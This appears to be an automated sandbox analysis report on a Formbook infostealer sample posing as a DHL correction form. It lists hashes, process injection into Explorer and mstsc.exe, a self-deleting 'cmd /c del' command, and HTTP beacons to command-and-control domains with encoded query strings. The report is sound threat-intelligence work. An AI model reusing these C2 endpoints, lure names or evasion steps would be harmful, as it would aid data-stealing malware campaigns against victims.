Analysis

  • max time kernel
    148s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    16/01/2025, 07:28 UTC

General

  • Target

    DHL CORRECTION FORM.exe

  • Size

    247KB

  • MD5

    ba501476d5eed368c2975c5e9976ba41

  • SHA1

    535282f5234f5c48a05bcec25026fa32c4a05617

  • SHA256

    11c98c3bbf3f08f0d47153a819980189eacc20b3eaa44d2a88ec8a8aac17abda

  • SHA512

    630edacc8ae82d10f54168d3ab018f961c6c6c15fb1f68a227d6c716e38ea341430984105aaccb96cd20bf7810f883b8cb6073c82f8ab648dcc1a58409d8efa3

  • SSDEEP

    6144:69LI3rIbe7ixvQXf1G7Qtbfy1+D1NbWF6VomjoW3ziGQ:II76e7ixvuKQtbfy1GbWF6LjoWFQ

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

ny03

Decoy


Signatures

  • Formbook

    Formbook is a data-stealing malware family.

  • Formbook family
  • Formbook payload 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 62 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3520
    • C:\Users\Admin\AppData\Local\Temp\DHL CORRECTION FORM.exe
      "C:\Users\Admin\AppData\Local\Temp\DHL CORRECTION FORM.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      PID:4376
    • C:\Windows\SysWOW64\mstsc.exe
      "C:\Windows\SysWOW64\mstsc.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3096
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Local\Temp\DHL CORRECTION FORM.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4604

Network

  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    22.160.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.160.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    7.98.22.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    7.98.22.2.in-addr.arpa
    IN PTR
    Response
    7.98.22.2.in-addr.arpa
    IN PTR
    a2-22-98-7.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    58.55.71.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    58.55.71.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    197.87.175.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    197.87.175.4.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    20.49.80.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    20.49.80.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.udrahotels.live
    Remote address:
    8.8.8.8:53
    Request
    www.udrahotels.live
    IN A
    Response
  • flag-us
    DNS
    www.halc.info
    Remote address:
    8.8.8.8:53
    Request
    www.halc.info
    IN A
    Response
    www.halc.info
    IN CNAME
    ext-sq.squarespace.com
    ext-sq.squarespace.com
    IN A
    198.49.23.144
    ext-sq.squarespace.com
    IN A
    198.185.159.144
    ext-sq.squarespace.com
    IN A
    198.49.23.145
    ext-sq.squarespace.com
    IN A
    198.185.159.145
  • flag-us
    GET
    http://www.halc.info/ny03/?9rz4X4d0=w/SQTW7+G142Z7KaXOQMyZk0SO1QkT1kWw0kpqSiblnC9ySkkTVeusiPbLujBQetxHqb&2dz=ETS4_86POxgX78y
    Explorer.EXE
    Remote address:
    198.49.23.144:80
    Request
    GET /ny03/?9rz4X4d0=w/SQTW7+G142Z7KaXOQMyZk0SO1QkT1kWw0kpqSiblnC9ySkkTVeusiPbLujBQetxHqb&2dz=ETS4_86POxgX78y HTTP/1.1
    Host: www.halc.info
    Connection: close
    Response
    HTTP/1.1 403 Forbidden
    Connection: close
    Server: Squarespace
    X-Contextid: OnQdCVBP/FghFPu3i
    X-Sqsp-Edge: true
    Date: Thu, 16 Jan 2025 07:29:06 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
  • flag-us
    DNS
    144.23.49.198.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    144.23.49.198.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    181.129.81.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    181.129.81.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.nfopointgestao.online
    Remote address:
    8.8.8.8:53
    Request
    www.nfopointgestao.online
    IN A
    Response
  • flag-us
    DNS
    133.130.81.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.130.81.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.wise.xyz
    Remote address:
    8.8.8.8:53
    Request
    www.wise.xyz
    IN A
    Response
    www.wise.xyz
    IN A
    76.223.54.146
    www.wise.xyz
    IN A
    13.248.169.48
  • flag-us
    GET
    http://www.wise.xyz/ny03/?9rz4X4d0=eZe+jsGIqIRctMV29zHFtPyQPZuCypS7zY1g0KjuV2TPvNtlf9nAgkOWGU2cTmwv3U0x&2dz=ETS4_86POxgX78y
    Explorer.EXE
    Remote address:
    76.223.54.146:80
    Request
    GET /ny03/?9rz4X4d0=eZe+jsGIqIRctMV29zHFtPyQPZuCypS7zY1g0KjuV2TPvNtlf9nAgkOWGU2cTmwv3U0x&2dz=ETS4_86POxgX78y HTTP/1.1
    Host: www.wise.xyz
    Connection: close
    Response
    HTTP/1.1 200 OK
    content-type: text/html
    date: Thu, 16 Jan 2025 07:29:47 GMT
    content-length: 212
    connection: close
  • flag-us
    DNS
    146.54.223.76.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    146.54.223.76.in-addr.arpa
    IN PTR
    Response
    146.54.223.76.in-addr.arpa
    IN PTR
    a904c694c05102f30.awsglobalaccelerator.com
  • flag-us
    DNS
    www.ipraya168.cyou
    Remote address:
    8.8.8.8:53
    Request
    www.ipraya168.cyou
    IN A
    Response
  • flag-us
    DNS
    www.eidmueller.cloud
    Remote address:
    8.8.8.8:53
    Request
    www.eidmueller.cloud
    IN A
    Response
  • 198.49.23.144:80
    http://www.halc.info/ny03/?9rz4X4d0=w/SQTW7+G142Z7KaXOQMyZk0SO1QkT1kWw0kpqSiblnC9ySkkTVeusiPbLujBQetxHqb&2dz=ETS4_86POxgX78y
    http
    Explorer.EXE
    444 B
    2.5kB
    6
    6

    HTTP Request

    GET http://www.halc.info/ny03/?9rz4X4d0=w/SQTW7+G142Z7KaXOQMyZk0SO1QkT1kWw0kpqSiblnC9ySkkTVeusiPbLujBQetxHqb&2dz=ETS4_86POxgX78y

    HTTP Response

    403
  • 76.223.54.146:80
    http://www.wise.xyz/ny03/?9rz4X4d0=eZe+jsGIqIRctMV29zHFtPyQPZuCypS7zY1g0KjuV2TPvNtlf9nAgkOWGU2cTmwv3U0x&2dz=ETS4_86POxgX78y
    http
    Explorer.EXE
    397 B
    505 B
    5
    4

    HTTP Request

    GET http://www.wise.xyz/ny03/?9rz4X4d0=eZe+jsGIqIRctMV29zHFtPyQPZuCypS7zY1g0KjuV2TPvNtlf9nAgkOWGU2cTmwv3U0x&2dz=ETS4_86POxgX78y

    HTTP Response

    200
  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    22.160.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    22.160.190.20.in-addr.arpa

  • 8.8.8.8:53
    7.98.22.2.in-addr.arpa
    dns
    68 B
    129 B
    1
    1

    DNS Request

    7.98.22.2.in-addr.arpa

  • 8.8.8.8:53
    58.55.71.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    58.55.71.13.in-addr.arpa

  • 8.8.8.8:53
    197.87.175.4.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    197.87.175.4.in-addr.arpa

  • 8.8.8.8:53
    206.23.85.13.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    206.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    20.49.80.91.in-addr.arpa
    dns
    70 B
    145 B
    1
    1

    DNS Request

    20.49.80.91.in-addr.arpa

  • 8.8.8.8:53
    www.udrahotels.live
    dns
    65 B
    133 B
    1
    1

    DNS Request

    www.udrahotels.live

  • 8.8.8.8:53
    www.halc.info
    dns
    59 B
    159 B
    1
    1

    DNS Request

    www.halc.info

    DNS Response

    198.49.23.144
    198.185.159.144
    198.49.23.145
    198.185.159.145

  • 8.8.8.8:53
    144.23.49.198.in-addr.arpa
    dns
    72 B
    126 B
    1
    1

    DNS Request

    144.23.49.198.in-addr.arpa

  • 8.8.8.8:53
    181.129.81.91.in-addr.arpa
    dns
    72 B
    147 B
    1
    1

    DNS Request

    181.129.81.91.in-addr.arpa

  • 8.8.8.8:53
    11.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    11.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    www.nfopointgestao.online
    dns
    71 B
    136 B
    1
    1

    DNS Request

    www.nfopointgestao.online

  • 8.8.8.8:53
    133.130.81.91.in-addr.arpa
    dns
    72 B
    147 B
    1
    1

    DNS Request

    133.130.81.91.in-addr.arpa

  • 8.8.8.8:53
    www.wise.xyz
    dns
    58 B
    90 B
    1
    1

    DNS Request

    www.wise.xyz

    DNS Response

    76.223.54.146
    13.248.169.48

  • 8.8.8.8:53
    146.54.223.76.in-addr.arpa
    dns
    72 B
    128 B
    1
    1

    DNS Request

    146.54.223.76.in-addr.arpa

  • 8.8.8.8:53
    www.ipraya168.cyou
    dns
    64 B
    129 B
    1
    1

    DNS Request

    www.ipraya168.cyou

  • 8.8.8.8:53
    www.eidmueller.cloud
    dns
    66 B
    131 B
    1
    1

    DNS Request

    www.eidmueller.cloud

MITRE ATT&CK Enterprise v15

Downloads

  • memory/3096-4-0x0000000000940000-0x0000000000A7A000-memory.dmp

    Filesize

    1.2MB

  • memory/3096-6-0x0000000000940000-0x0000000000A7A000-memory.dmp

    Filesize

    1.2MB

  • memory/3096-7-0x0000000000330000-0x000000000035F000-memory.dmp

    Filesize

    188KB

  • memory/3520-3-0x00000000089C0000-0x0000000008B5E000-memory.dmp

    Filesize

    1.6MB

  • memory/3520-8-0x00000000089C0000-0x0000000008B5E000-memory.dmp

    Filesize

    1.6MB

  • memory/3520-12-0x0000000008C90000-0x0000000008E0B000-memory.dmp

    Filesize

    1.5MB

  • memory/3520-13-0x0000000008C90000-0x0000000008E0B000-memory.dmp

    Filesize

    1.5MB

  • memory/3520-15-0x0000000008C90000-0x0000000008E0B000-memory.dmp

    Filesize

    1.5MB

  • memory/4376-0-0x00000000012E0000-0x000000000162A000-memory.dmp

    Filesize

    3.3MB

  • memory/4376-2-0x0000000000570000-0x00000000005AF000-memory.dmp

    Filesize

    252KB

  • memory/4376-1-0x000000000058F000-0x0000000000590000-memory.dmp

    Filesize

    4KB
